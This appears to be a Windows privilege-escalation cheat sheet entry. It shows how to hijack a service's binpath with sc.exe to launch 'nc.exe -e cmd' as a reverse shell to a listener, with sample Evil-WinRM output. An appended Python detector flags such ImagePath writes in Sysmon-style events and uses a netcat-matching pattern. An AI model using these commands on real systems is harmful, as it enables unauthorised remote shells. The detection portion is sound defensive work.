Abuse #1. Modify service path
# Start a nc listener
rlwrap nc -lvnp <LOCAL_PORT>
Sample Output:
$ rlwrap nc -lvnp 443
listening on [any] 443 ...
1. Change service path
# Assumes nc.exe has already been uploaded
sc.exe config <SERVICE> binpath="C:\ProgramData\nc.exe -e cmd <LOCAL_IP> <LOCAL_PORT>"
Sample Output:
*Evil-WinRM* PS C:\ProgramData> sc.exe config VSS binpath="C:\ProgramData\nc.exe -e cmd 10.10.14.44 443"
[SC] ChangeServiceConfig SUCCESS
2. Restart service
# Stop service
sc.exe stop <SERVICE>
Sample Output:
*Evil-WinRM* PS C:\windows\tasks> sc.exe stop VSS
[SC] ControlService FAILED 1062:
The service has not been started.
# Start service
sc.exe start <SERVICE>
Sample Output:
*Evil-WinRM* PS C:\windows\tasks> sc.exe start VSS
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.
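From the defender's side, the ImagePath rewrite shown above is visible as a registry value-set event (Sysmon Event ID 13 on HKLM\SYSTEM\CurrentControlSet\Services\<service>\ImagePath). The following Python is an added detection example, not part of the original cheat sheet: it parses constructed Sysmon-style records (a simplified key=value framing, not a real EVTX export) and flags ImagePath writes whose binary lives outside trusted system directories or whose command line references a netcat-style tool.

```python
import re
from dataclasses import dataclass

# Constructed sample records modelled on Sysmon Event ID 13 fields
# (Image, User, TargetObject, Details). Framing is simplified; values may
# contain spaces, so they are split on " Key=" boundaries, not on spaces.
SAMPLE_EVENTS = [
    'EventID=13 Image=C:\\Windows\\System32\\sc.exe User=CORP\\svc_backup '
    'TargetObject=HKLM\\System\\CurrentControlSet\\Services\\VSS\\ImagePath '
    'Details=C:\\ProgramData\\nc.exe -e cmd 10.10.14.44 443',
    'EventID=13 Image=C:\\Windows\\System32\\services.exe User=NT AUTHORITY\\SYSTEM '
    'TargetObject=HKLM\\System\\CurrentControlSet\\Services\\VSS\\Start '
    'Details=DWORD (0x00000003)',
    'EventID=13 Image=C:\\Windows\\System32\\msiexec.exe User=NT AUTHORITY\\SYSTEM '
    'TargetObject=HKLM\\System\\CurrentControlSet\\Services\\Spooler\\ImagePath '
    'Details=C:\\Windows\\System32\\spoolsv.exe',
]

TRUSTED_PREFIXES = ('c:\\windows\\', 'c:\\program files\\', 'c:\\program files (x86)\\')
SHELL_TOOL_RE = re.compile(r'\b(nc|ncat|netcat)(\.exe)?\b', re.IGNORECASE)
IMAGEPATH_RE = re.compile(r'\\Services\\([^\\]+)\\ImagePath$', re.IGNORECASE)

@dataclass
class Finding:
    service: str
    user: str
    new_path: str
    reasons: list

def parse_event(line):
    """Split one record into a dict; each value runs until the next ' Key='."""
    return dict(f.split('=', 1) for f in re.split(r' (?=[A-Za-z]+=)', line.strip()))

def executable_of(command_line):
    """Return the executable part of a service command line (quoted or bare)."""
    cmd = command_line.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        return cmd[1:end] if end > 0 else cmd[1:]
    return cmd.split(' ', 1)[0]

def check_event(event):
    """Return a Finding for a suspicious ImagePath write, otherwise None."""
    m = IMAGEPATH_RE.search(event.get('TargetObject', ''))
    if event.get('EventID') != '13' or not m:
        return None
    new_path = event.get('Details', '')
    reasons = []
    if not executable_of(new_path).lower().startswith(TRUSTED_PREFIXES):
        reasons.append('binary outside trusted system directories')
    if SHELL_TOOL_RE.search(new_path):
        reasons.append('command line references a netcat-style tool')
    return Finding(m.group(1), event.get('User', '?'), new_path, reasons) if reasons else None

def scan(lines):
    return [f for f in (check_event(parse_event(l)) for l in lines) if f]

if __name__ == '__main__':
    for f in scan(SAMPLE_EVENTS):
        print(f'[!] {f.service}: ImagePath set by {f.user} -> {f.new_path} ({"; ".join(f.reasons)})')
```

Restricting the sample to Event ID 13 on the ImagePath value keeps legitimate start-type changes (the Start value) and installer-driven updates under C:\Windows out of the alert set.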